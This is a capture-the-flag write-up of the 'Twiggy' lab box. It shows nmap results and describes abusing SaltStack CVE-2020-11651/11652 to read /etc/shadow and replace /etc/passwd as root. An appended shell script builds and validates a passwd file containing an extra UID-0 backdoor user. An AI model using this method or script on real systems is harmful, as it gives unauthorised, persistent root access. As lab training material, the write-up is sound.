Twiggy

Nmap Scan

$ nmap -sC -sV -Pn -oN nmap 192.168.160.62          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 12:39 +08
Nmap scan report for 192.168.160.62
Host is up (0.0076s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:7d:1a:56:9b:68:ae:f5:3b:f6:38:17:73:16:5d:75 (RSA)
|   256 1c:78:9d:83:81:52:f4:b0:1d:8e:32:03:cb:a6:18:93 (ECDSA)
|_  256 08:c9:12:d9:7b:98:98:c8:b3:99:7a:19:82:2e:a3:ea (ED25519)
53/tcp   open  domain  NLnet Labs NSD
80/tcp   open  http    nginx 1.16.1
|_http-title: Home | Mezzanine
|_http-server-header: nginx/1.16.1
8000/tcp open  http    nginx 1.16.1
|_http-title: Site doesn't have a title (application/json).
|_http-server-header: nginx/1.16.1
|_http-open-proxy: Proxy might be redirecting requests

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.22 seconds

Initial Access

Port 8000

On port 8000 there is an HTTP server running, and nmap already hints that it answers with JSON rather than HTML. This is what is shown when browsing to it.

Directory Enumeration

If I try to access /events, I am greeted with this error message.

However, after searching online, there is not much information regarding the software that is running here.

Port 80

Port 80 serves a Mezzanine site (the http-title in the scan is "Home | Mezzanine").

Further enumeration shows that there is a login page to an admin site.

However, we are unable to get in through the login page.

Directory Enumeration

The sitemap.xml lists no URLs that look interesting.

After checking all of this, I suspected I was missing something, so I rescanned, this time with all ports. The scan reveals two additional ports speaking ZeroMQ ZMTP 2.0. Two ZMTP listeners side by side is what a SaltStack master looks like to nmap: its publish and request ports (4505 and 4506 by default) are ZeroMQ sockets.

CVE-2020-11651 and CVE-2020-11652

Searching for this turns up two vulnerabilities in the Salt master: CVE-2020-11651, an authentication bypass in the master's request server that lets an unauthenticated client call functions it should not, and CVE-2020-11652, a directory traversal in the master's wheel module that allows reading and writing files outside the intended directories.

I tested whether the public exploit works and, sure enough, it is able to read files from the server.

However, after many attempts, we are not able to get our own reverse shell payload to run.

However, reading /etc/shadow succeeds. Since /etc/shadow is only readable by root (or the shadow group), the salt-master process we are talking to must be running as root, which also means any file it writes on our behalf is written as root.

Upload new /etc/passwd file

We build a new passwd file from the target's own /etc/passwd, read through the exploit (not from our attacking machine, or the target's existing accounts would break), and append an extra user, root2, with UID 0 and a password hash we generate ourselves.

Next, we upload the file over /etc/passwd on the target using the exploit's file-write capability. It is worth re-reading /etc/passwd through the exploit afterwards to confirm the write landed intact, because a malformed passwd file locks everyone out, including us.

We should then be able to log in over SSH as root2 with the password we set, and since its UID is 0 the shell is root.
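The following is an added example, not code from the original writeup or from the exploit it uses. It builds the replacement passwd content and sanity-checks it before anything is uploaded, so that a typo does not brick the target's logins. The target's /etc/passwd content is a constructed sample here (in practice it is the file read through the exploit), the hash is a placeholder standing in for the output of `openssl passwd -6`, and the new user's home directory (/root) and shell (/bin/bash) are assumptions. Nothing in the block talks to the target; the upload itself is still done with the exploit.

```shell
#!/bin/sh
# Added example: prepare and validate a /etc/passwd with an extra UID-0 user.
# Not part of the original writeup or of the Salt exploit; the sample passwd
# content and the hash below are constructed placeholders.

# Constructed stand-in for the target's /etc/passwd as read via the exploit.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
nginx:x:997:995:Nginx web server:/var/lib/nginx:/sbin/nologin
salt:x:996:994::/home/salt:/bin/bash'

# Emit the original passwd content followed by one extra UID 0 / GID 0 entry.
# $1 = original passwd content, $2 = new username, $3 = crypt(3) hash.
# Home /root and shell /bin/bash are assumptions for this example.
add_uid0_user() {
    printf '%s\n' "$1"
    printf '%s:%s:0:0:%s:/root:/bin/bash\n' "$2" "$3" "$2"
}

# Validate candidate passwd content before uploading it.
# Returns 0 if it is safe to upload, 1 (with a reason on stdout) otherwise:
#  - every line must have exactly 7 colon-separated fields
#  - no username may appear twice
#  - the real root entry must keep UID 0 and a non-empty shell
#  - the new user ($2) must be present with UID 0
validate_passwd() {
    printf '%s\n' "$1" | awk -F: -v newuser="$2" '
        NF != 7                              { print "bad field count on line " NR; bad = 1 }
        seen[$1]++                           { print "duplicate user " $1; bad = 1 }
        $1 == "root" && ($3 != 0 || $7 == "") { print "root entry damaged"; bad = 1 }
        $1 == newuser && $3 == 0             { found = 1 }
        END {
            if (!found) { print newuser " not present with UID 0"; bad = 1 }
            if (bad) exit 1
            exit 0
        }'
}

# Stand-alone run: placeholder hash; generate a real one with
#   openssl passwd -6 'YourPassword'
HASH='$6$saltsalt$placeholderhashvalue'
NEW_PASSWD=$(add_uid0_user "$SAMPLE_PASSWD" root2 "$HASH")
if validate_passwd "$NEW_PASSWD" root2; then
    printf '%s\n' "$NEW_PASSWD"
fi
```

Redirect the printed content to a local file (for example `> passwd.new`) and hand that file to the exploit's upload step; after uploading, read /etc/passwd back through the same exploit and diff it against passwd.new before attempting the SSH login.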
